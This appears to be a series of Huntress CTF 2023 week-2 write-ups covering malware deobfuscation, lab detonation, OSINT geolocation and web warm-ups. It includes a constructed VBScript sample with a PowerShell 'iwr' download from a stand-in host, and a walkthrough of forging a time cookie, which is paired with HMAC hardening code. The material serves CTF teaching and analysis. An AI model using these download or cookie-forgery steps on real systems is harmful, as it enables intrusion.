Huntress CTF: Week 2 – Malware: VeeBeeEee, Snake Eater, Opendir

VeeBeeEee

First examine the file contents.

Ooof. That hurts the eyes. If we throw it into CyberChef, with the assistance of some magic (or detailed reading of the challenge), we see that it’s VB Script, which can be converted using the Microsoft Script Decoder recipe.

Copy the output to VS Code.

The syntax highlighting shows that all the `""""""""al37ysoeopm'al37ysoeopm` entries are just comments, so let's remove them.

There also seems to be an abundance of "&" obscuring the code. We'll remove them too.

That’s a lot more readable. Looking at the code we see it’s going to use PowerShell to create a file C:\Users\Pubic\Documents\July.htm using as input the content from a pastebin URL.
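The two clean-up steps above (dropping the comment padding, then collapsing the `"a" & "b"` string concatenations) can be scripted so the decoded script reads the same way without hand-editing. This is an added example, not the challenge author's or the malware's code; the VBScript sample and the URL in it are constructed to mimic the decoded file.

```python
import re

# Constructed sample mimicking the decoded script: comment padding on every line
# and the real command split into "&"-joined string literals.
SAMPLE_VBS = r"""Set sh = CreateObject("WScript.Shell") ''''''''al37ysoeopm'al37ysoeopm
''''''''al37ysoeopm'al37ysoeopm
cmd = "pow" & "ersh" & "ell -c iwr " & "http://paste.example.invalid/raw/x"
sh.Run cmd & " & exit", 0 ''''''''al37ysoeopm'al37ysoeopm
"""

# "literal" & "literal"; a doubled "" inside a literal is VB's escaped quote.
CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')


def strip_comments(line):
    """Drop everything from the first ' that is not inside a string literal."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str  # an escaped "" toggles twice, so the state is unchanged
        elif ch == "'" and not in_str:
            return line[:i].rstrip()
    return line.rstrip()


def join_literals(line):
    """Repeatedly merge adjacent literal pairs; an & outside literals is left alone."""
    while True:
        merged = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
        if merged == line:
            return merged
        line = merged


def deobfuscate(text):
    """Return the non-empty, comment-free, concatenation-collapsed lines."""
    cleaned = (join_literals(strip_comments(raw)) for raw in text.splitlines())
    return [line for line in cleaned if line.strip()]


def extract_urls(lines):
    """Pull URLs out of the cleaned script for the analysis notes."""
    return sorted(set(re.findall(r'https?://[^\s"]+', "\n".join(lines))))


if __name__ == "__main__":
    for line in deobfuscate(SAMPLE_VBS):
        print(line)
    print("URLs:", extract_urls(deobfuscate(SAMPLE_VBS)))
```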


Snake Eater

We’ll detonate snake_eater.exe in our lab environment.

I really enjoyed this challenge as I used my detonaRE PowerShell script to control the detonation and solve the challenge. Besides firing the malware itself, the script will initiate a pcap capture and monitor the malware process using Process Monitor. The script then converts the ProcMon output to CSV for easy analysis.

Scrolling through the CSV we find that the application was writing a file to:

~\AppData\Roaming\Mael Horns\flag{hashforflag}
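Rather than scrolling the whole export, the file-write events for the detonated process can be filtered out of the ProcMon CSV directly. This is an added example, not the detonaRE script; the CSV rows are constructed in the layout ProcMon uses for its CSV export, and the process name, path and flag value are placeholders.

```python
import csv
import io

# Constructed ProcMon CSV export: the header row matches ProcMon's default columns.
SAMPLE_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"3:14:15.0000001 PM","snake_eater.exe","4242","RegQueryValue","HKLM\\SOFTWARE\\Example","SUCCESS","Type: REG_SZ"
"3:14:15.0000002 PM","snake_eater.exe","4242","CreateFile","C:\\Users\\lab\\AppData\\Roaming\\Example Dir","SUCCESS","Desired Access: Read Attributes"
"3:14:15.0000003 PM","snake_eater.exe","4242","CreateFile","C:\\Users\\lab\\AppData\\Roaming\\Example Dir\\flag{constructed}","SUCCESS","Desired Access: Generic Write"
"3:14:15.0000004 PM","snake_eater.exe","4242","WriteFile","C:\\Users\\lab\\AppData\\Roaming\\Example Dir\\flag{constructed}","SUCCESS","Offset: 0, Length: 32"
"3:14:15.0000005 PM","explorer.exe","1234","WriteFile","C:\\Users\\lab\\AppData\\Roaming\\other.log","SUCCESS","Offset: 0, Length: 8"
"3:14:15.0000006 PM","snake_eater.exe","4242","WriteFile","C:\\Users\\lab\\AppData\\Roaming\\denied.bin","ACCESS DENIED","Offset: 0, Length: 8"
'''

WRITE_OPS = {"WriteFile", "SetDispositionInformationFile"}


def file_writes(csv_text, process_name):
    """Return (operation, path) pairs where the process actually wrote to disk.

    WriteFile rows and CreateFile rows opened for writing are kept; failed
    operations and other processes are dropped.
    """
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Result"] != "SUCCESS":
            continue
        op = row["Operation"]
        opened_for_write = op == "CreateFile" and "Generic Write" in row["Detail"]
        if op in WRITE_OPS or opened_for_write:
            hits.append((op, row["Path"]))
    return hits


def written_paths(csv_text, process_name):
    """Distinct paths the process wrote, in first-seen order."""
    return list(dict.fromkeys(path for _, path in file_writes(csv_text, process_name)))


if __name__ == "__main__":
    for path in written_paths(SAMPLE_CSV, "snake_eater.exe"):
        print(path)
```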

Opendir

Let’s get Started

The link brings us to an Open Directory (duh) with lots of scripts and executables, not to mention a number of subdirectories.

The first thing to do is grab everything.

Site Sucker works well for this.

Once we’ve captured all the files and subdirectories locally we can search through them en masse. Once again in this CTF, the_silver_searcher (ag) comes into play.

Tucked away in /sir/64_bit_new/oui.txt is the flag.


Use the tag #HuntressCTF on BakerStreetForensics.com to see all related posts and solutions for the 2023 Huntress CTF.

Huntress CTF: Week 2 – OSINT: Where Am I?, Operation Not Found, Under the Bridge

Where Am I?

Opening the picture we see it’s a location.

I’ve frequently used exiftool to inspect the metadata of pictures, including GPS coordinates.

The file does contain GPS metadata, but before we even get there, the Image Description looks out of the ordinary…

Instead of the usual CyberChef, this time we’ll do the conversion using PowerShell.

The converted string is our flag.


Operation Not Found

First off, let's adjust the positioning of the image and see if we can get a better view of our location.

That’s better.

Actually when I ran this challenge, I started on my mobile device.

I took a screenshot of the building and then used the Google Lens function to identify the building.

Georgia Tech Library. That’s consistent with the description in the challenge. I bring up the location in Google Maps.

Zooming and scrolling and zooming and scrolling to get the Google Maps location and the mini-map on the challenge to the same area. The mini-map is a PAIN to navigate. Even knowing where I was going, it took me several minutes to manipulate my positioning on the map.

But once I’m finally there, I mark my location and submit for the flag and…


Under the Bridge

Pretty much the same methodology as above.

Pivot the screen for a clearer landmark.

Grab a screenshot and send it to Google Lens.

Rickroll Tunnel. LOL.

Once again back and forth with Google Maps and the mini-map and getting familiar with all the London highways, and finally….




Huntress CTF: Week 2 – WarmUps

Chicken Wings

Opening the file with a text editor yields… (if you’re old like me you may recognize it)

Wingdings! Head over to dcode.fr and translate it.


F12

Hit the Start button and we’re provided with a URL and port.

Open the site in a browser and enable source debugging, usually “F12” as the challenge suggests.

If you click on the blue Capture The Flag button, you may observe a VERY quick pop-up.

If we scroll to the bottom of the source code (in CTFs and malware analysis I always tend to hunt bottom-up first), we see that the pop-up being invoked is at ./capture_the_flag.htm/. If we append that to our current URL…

We get to our flag page. Here I right clicked on the “Your flag is:” to select View Page Source.


Magic Cookies

As with previous interactive challenges, we'll start with the obvious "Start".

We have a URL and port. Let’s open this in Chrome.

Pressing cook next to one of the recipes starts a countdown timer.

F12 in Chrome will toggle the Developer options.

Navigating to Application > Storage reveals the cookies. We have a cookie for in_oven with a Base64 value.

This gets decoded as {"recipe": "Magic Cookies", "time": "10/11/2023, 15:50:04"}

Having also reviewed the source code, it looks like this value represents the start of the 'baking.' Either we can wait around for 120 hours to see what happens next, or we can travel through time. Sort of.

So we know the formula for the cookie values. We can use that to generate our own cookie. Using the same text, only changing the date to 10/06/2023, we’ll encode that string in Base64.

There's a plugin for Chrome called "🍪 EditThisCookie".

Substitute the Base64 we generated and apply the cookie.

Refresh the window and the flag should appear.
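The challenge works because the server trusts a start time that the client supplies. As an added example (not the challenge's code), the block below reproduces the cookie format from this post, shows that the 120-hour check accepts a back-dated cookie, and then shows the usual fix: an HMAC over the value so that a cookie the server did not issue is rejected. The `in_oven` name and JSON layout come from the post; the signing key and the `.`-separated signature format are assumptions.

```python
import base64
import hashlib
import hmac
import json
from datetime import datetime, timedelta

BAKE_TIME = timedelta(hours=120)              # from the challenge
FMT = "%m/%d/%Y, %H:%M:%S"                    # "10/11/2023, 15:50:04"


def make_cookie(recipe, started):
    """Build the Base64 JSON value the challenge stores in the in_oven cookie."""
    body = json.dumps({"recipe": recipe, "time": started.strftime(FMT)})
    return base64.b64encode(body.encode()).decode()


def parse_cookie(value):
    """Decode the Base64 JSON value back into a dict."""
    return json.loads(base64.b64decode(value))


def is_baked(value, now):
    """The challenge's check: trusts whatever time the cookie claims."""
    started = datetime.strptime(parse_cookie(value)["time"], FMT)
    return now - started >= BAKE_TIME


def sign_cookie(value, key):
    """Hardened form: append an HMAC-SHA256 tag over the value (format assumed)."""
    tag = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def verify_cookie(signed, key):
    """Return the bare value if the tag checks out, else None."""
    value, sep, tag = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(expected, tag) else None


if __name__ == "__main__":
    now = datetime(2023, 10, 11, 16, 0, 0)
    real = make_cookie("Magic Cookies", datetime(2023, 10, 11, 15, 50, 4))
    backdated = make_cookie("Magic Cookies", datetime(2023, 10, 6, 15, 50, 4))
    print("real baked?", is_baked(real, now), "backdated baked?", is_baked(backdated, now))
    key = b"constructed-server-secret"
    print("forged signature accepted?", verify_cookie(sign_cookie(backdated, b"guess"), key) is not None)
```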

